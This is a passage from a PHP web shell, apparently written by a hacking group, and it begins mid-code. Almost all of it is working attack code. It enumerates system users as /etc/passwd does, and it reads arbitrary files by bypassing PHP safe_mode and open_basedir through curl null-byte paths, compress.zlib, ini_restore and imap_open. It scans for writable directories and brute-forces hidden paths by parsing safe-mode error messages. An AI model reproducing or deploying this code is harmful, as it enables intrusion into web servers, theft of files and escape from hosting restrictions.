tRyaG TeaM ___ IsL4m1C ~ W4rR10R

---

", 3,$ERORR); } // id // if ($_POST['plugin'] ){ echo "read file id" ,"
"; echo ""; for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; } } echo ""; break; } // CURL // if(empty($_POST['curl'])){ } else { echo "read file CURL","
" ; echo ""; $m=$_POST['curl']; $ch = curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); echo ""; } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { echo "read file copy" ,"
"; echo ""; $u1p=$_POST['copy']; $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$u1p, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "".htmlspecialchars($tekst).""; unlink($temp); echo ""; } else { die("Sorry... File ".htmlspecialchars($u1p)." dosen't exists or you don't have access."); } } /// ini_restore // if(empty($_POST['M2'])){ } else { echo "read file ini_restore","
"; echo ""; $m=$_POST['M2']; echo ini_get("safe_mode"); echo ini_get("open_basedir"); $s=readfile("$m"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); $s=readfile("$m"); echo ""; } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { echo "read file imap" ,"
"; echo ""; $stream = imap_open($string, "", ""); $str = imap_body($stream, 1); if (!empty($str)) echo "<pre>".$str."</pre>"; imap_close($stream); echo ""; } elseif ($string && $switch == "dir") { echo "read dir imap","
" ; echo ""; $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "<pre>"; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]"."<p> </p>" ; echo "</pre>"; imap_close($stream); echo ""; } $tb->tdbody (""); // open dir // $tb->tableheader(); $tb->tdbody('

Exploit: Open dir

','center','top'); $tb->tdbody('

'); if(empty($_POST['m'])){ echo " path dir "; } else { $m=$_POST['m']; $spath = $m ; $path = $m ; $method = intval(trim($_POST['method'])); $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file = readdir($handle))) { $full_path = "$path/$file"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0777')) { if (!file_exists('.*')) { $_folders[$i] = $file; $i++; } } } closedir($handle); clearstatcache(); echo 'The folders is 777 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0755')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 755 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0644')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 644 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0750')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 750 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0604')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 604 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0705')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 705 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0606')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 606 : '; foreach ($_folders as $folder) { echo $folder.' '; } ////////// $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); if ((is_dir($full_path)) && ($perms == '0703')) { if (!file_exists('.*')) { $_folders[$i] = $file1; $i++; } } } clearstatcache(); echo 'The folders is 703 : '; foreach ($_folders as $folder) { echo $folder.' '; } } $handle = opendir($path); $_folders = array(); $i = 0; while (false !== ($file1 = readdir($handle))) { $full_path = "$path/$file1"; $perms = substr(sprintf('%o', fileperms($full_path)), -4); $_folders[$i] = $file1; $i++; } clearstatcache(); echo 'The folders and file all : '; foreach ($_folders as $folder) { echo $folder.' '; } echo 'The total : '.$i.' '; $tb->tdbody ("

"); $tb->tableheader(); $tb->tdbody('

Exploit: break fucking safe-mode

','center','top'); $tb->tdbody('

'); error_reporting(E_WARNING); ini_set("display_errors", 1); echo ""; echo " "; echo " Root directory: "; echo " "; // break fucking safe-mode ! $root = "/"; if($_POST['root']) $root = $_POST['root']; if (!ini_get('safe_mode')) die("Safe-mode is OFF."); echo ""; $c = 0; $D = array(); set_error_handler("eh"); $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; for($i=0; $i < strlen($chars); $i++){ $path ="".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; $prevD = $D[count($D)-1]; glob($path."*"); if($D[count($D)-1] != $prevD){ for($j=0; $j < strlen($chars); $j++){ $path ="".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; $prevD2 = $D[count($D)-1]; glob($path."*"); if($D[count($D)-1] != $prevD2){ for($p=0; $p < strlen($chars); $p++){ $path ="".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; $prevD3 = $D[count($D)-1]; glob($path."*"); if($D[count($D)-1] != $prevD3){ for($r=0; $r < strlen($chars); $r++){ $path ="".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; glob($path."*"); } } } } } } } $D = array_unique($D); foreach($D as $item) echo "\n"; function eh($errno, $errstr, $errfile, $errline){ global $D, $c, $i; preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); if($o){ $D[$c] = $o[2]; $c++;} } echo ""; $tb->tdbody ("

"); ?>